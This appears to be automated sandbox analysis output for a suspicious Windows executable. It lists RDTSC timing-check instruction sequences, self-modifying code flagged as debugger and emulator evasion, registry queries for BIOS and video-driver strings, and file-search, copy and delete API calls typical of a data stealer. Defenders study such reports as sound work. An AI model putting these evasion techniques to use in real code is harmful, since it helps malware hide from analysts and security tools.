                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432192 second address: 14321A6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65A4C18F96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F65A4C18F96h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14321A6 second address: 14321BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Dh 0x00000007 ja 00007F65A4502596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14321BD second address: 14321C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B677 second address: 143B6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F65A4502596h 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65A45025A8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B6A3 second address: 143B6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B6A9 second address: 143B6B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AEE1 second address: 137AEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AEE7 second address: 137AEF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AEF1 second address: 137AEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B087 second address: 143B090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B090 second address: 143B0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18F9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B0A0 second address: 143B0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B0A6 second address: 143B0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65A4C18FA4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B0C2 second address: 143B0C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B398 second address: 143B3B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCDB second address: 143CCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCE1 second address: 143CCEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCEC second address: 143CCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCF0 second address: 143CCFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007F65A4C18F96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCFC second address: 143CD0E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A4502598h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F65A4502596h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD0E second address: 143CD37 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F96h 0x00000008 jmp 00007F65A4C18F9Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65A4C18F9Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD37 second address: 143CD6F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65A4502596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F65A45025B9h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD6F second address: 143CD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD75 second address: 143CD7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD7E second address: 143CD82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1449D88 second address: 1449DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A45025A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65A45025A4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14497D6 second address: 14497DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14497DC second address: 14497E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14497E0 second address: 14497EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E7D7 second address: 144E7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E7DB second address: 144E7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E7E3 second address: 144E7E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E7E9 second address: 144E803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E803 second address: 144E807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E807 second address: 144E811 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E811 second address: 144E817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E817 second address: 144E825 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E825 second address: 144E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E517 second address: 144E51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B7EB second address: 145B7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F65A4502596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B7F5 second address: 145B7F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B7F9 second address: 145B805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F65A4502596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B805 second address: 145B80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463CBB second address: 1463CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463CBF second address: 1463CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463CC3 second address: 1463D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F65A45025A9h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F65A45025A9h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463D06 second address: 1463D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463D0F second address: 1463D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463E57 second address: 1463E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463E5D second address: 1463E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463F95 second address: 1463F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463F9B second address: 1463FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F65A4502596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463FA7 second address: 1463FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146420C second address: 1464210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464210 second address: 1464216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464376 second address: 1464380 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65A45025A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14774FE second address: 1477506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1477506 second address: 147750A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147739C second address: 14773CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65A4C18FA3h 0x00000009 jmp 00007F65A4C18FA9h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1478C53 second address: 1478C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1478C57 second address: 1478C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14726CB second address: 14726EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F65A45025A9h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14726EE second address: 1472719 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F65A4C18FA3h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1485157 second address: 148516E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65A450259Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1484D87 second address: 1484D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65A4C18F96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1484D91 second address: 1484D9B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65A4502596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1484D9B second address: 1484DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1484DA4 second address: 1484DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1488282 second address: 14882A9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F65A4C18F96h 0x00000014 jmp 00007F65A4C18FA3h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14882A9 second address: 14882AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14882AD second address: 14882B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14960ED second address: 14960F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14963C6 second address: 14963CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14963CC second address: 14963D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496693 second address: 1496699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149680D second address: 1496812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496812 second address: 1496822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496822 second address: 149683D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F65A450259Bh 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496A33 second address: 1496A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496A37 second address: 1496A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149994D second address: 1499951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1499B8E second address: 1499B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1499B92 second address: 1499B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149CCFE second address: 149CD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C898 second address: 149C8A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070271 second address: 5070275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070275 second address: 5070279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070279 second address: 507027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507027F second address: 50702DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F65A4C18FA0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F65A4C18FA1h 0x00000017 add esi, 7ADD41B6h 0x0000001d jmp 00007F65A4C18FA1h 0x00000022 popfd 0x00000023 mov ebx, eax 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702DE second address: 50702E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702E4 second address: 5070303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, 3A2AEC20h 0x00000013 push edx 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507040C second address: 507041B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507041B second address: 5070420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1211CBD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13B9222 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13B965D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13B7DAF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 120F606 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13BE89B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00FC38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FC4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FBDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FBE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00FC4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00FC3EA0
